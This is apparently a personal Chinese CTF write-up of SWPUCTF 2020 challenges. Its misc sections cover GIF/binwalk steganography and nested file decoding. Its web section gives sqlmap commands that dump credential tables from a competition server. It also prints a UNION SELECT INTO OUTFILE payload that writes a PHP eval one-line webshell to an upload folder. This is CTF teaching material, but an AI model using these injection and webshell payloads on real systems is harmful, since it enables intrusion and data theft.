[huayang]

这次比赛一道题都没出，misc1就差一点点了哎

这次有借口杂项有密码学我完全不懂啊哈哈

web题简直难得不讲武德

没有签到题没有签到题没有签到题

web1 359度防护网站

[huayang]地址：http://182.150.46.187:8802/

看这种就扫后台

看见有泄漏文件

/index.php.bak

一个登陆地址

/administrator.html

说不爆破就不爆破嘛

也确实爆不出来

泄漏文件打开看看

解码看看

GET /important_index_its_so_long_right.php?id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

给出了一个地址

sql注入哦

查到有5个库

先看看hlnt

py sqlmap.py -u http://182.150.46.187:8802/important_index_its_so_long_right.php?id=1 -D h1nt -T help -C hint --dump

有个地址

访问看看

提示我们登陆，我们再查查另一个库

name和password不就来了吗

py sqlmap.py -u http://182.150.46.187:8802/important_index_its_so_long_right.php?id=1 -D LTLT -T login -C pwd --dump
py sqlmap.py -u http://182.150.46.187:8802/important_index_its_so_long_right.php?id=1 -D LTLT -T login -C usn --dump

温馨提醒：别用sqlmap自带的md5解密贼垃圾

密码

登陆先前那个后台

登陆完成看见后台有一个地址

放进bp看看

又有一个地址，进去看看

又给了个地址

限制了长度，前面是不是漏了什么

进去可以看见是文件上传

因为是看见别人的wp写的就直接说不能上传码

我们随便传一个图片看一下地址

之前sq注入的时候不是还有个地址吗，现在看看

这个页面是可以注入的只不过有点难

复制一份官方wp

getshell的常规方法中，利用sql语句的into outfile并不算罕见，只是由于很多情况下secure_file_priv并未设置，导致无法进行这类文件读写，但是这在渗透中仍然不应该是被忘记的一种方法，没有尝试就不能凭经验否定这种方法。我们尝试写入一句话，但是考虑到目录可能没有可写权限，我们需要找到一个确定有可写权限的文件夹，很容易联想到上传页面暴漏的文件夹就有可写权限，于是构造语句写入一句话

union select 1,2,3,'<?php eval($_POST[1])>'into outfile '/var/www/html/upl_oad_pat_h/qwer.php'--

链接蚁剑即可拿到flag

misc1 耗子尾汁

已保存在本网站，方便以后做讲解

文件地址：https://hellohy.top/CTFfx/hzwz.gif

下载文件发现是个gif图

接下来是我个人做题方式

发现是gif图首先想到应该是隐写

去逐帧看看呢 没有

再用rgb通道看看 没有

再去看看十六进制，发现什么也没有

那就只剩分离咯

因为第一次写这个就详细一点

打开kali新建一个文件夹

把耗子尾汁拖进去用binwalk进行分离

binwalk -e hzwz.gif

运行成功后会生成一个新的文件夹

打开发现

猜得到这个flag是假文件

我们把视频拖进final cat pro看看

在这个位置会发现base64

解码看看

猜测可能是什么东西的密码

我们再把视频分解一下

可以看见有一个压缩包，可能猜测没错

输入密码打开

先把上面那个解密

一共经过了三次解密base64，base32，hex

就只打到这里 哎后面的密码学是真不知道

接下来就是单表替换

在比赛的时候他会给你个flag的格式 xxx_xxxx_xxxxxx_xx _xxxxxxxxxxxx

多出来四位，所以那四位就是flag

所以最后的flag为 flag{you_have_signed_in_successfully}

mis2 套娃

文件地址：https://hellohy.top/CTFfx/1.xlsx

看这界面就晓得文件名有问题

下载下来改成zip格式

发现可以解压

RC4data.txt文件 考察的就是rc4解密 还要有key值

swpu.xls文件打不开

继续改继续，发现又可以解压

又是改？

十六进制打开看看，在最后我们看见了这个

所以这应该是压缩包的密码了

成功找到key值

所以最后就是

flag {ef1a73d40977a49b99b871980f355757}

官方文档：https://wllm1013.github.io/2020/12/09/SWPUCTF2020-%E5%AE%98%E6%96%B9WP/

野生文档：http://blog.wjhwjhn.com/archives/104/

[/huayang]

FROM：浅浅淡淡[hellohy]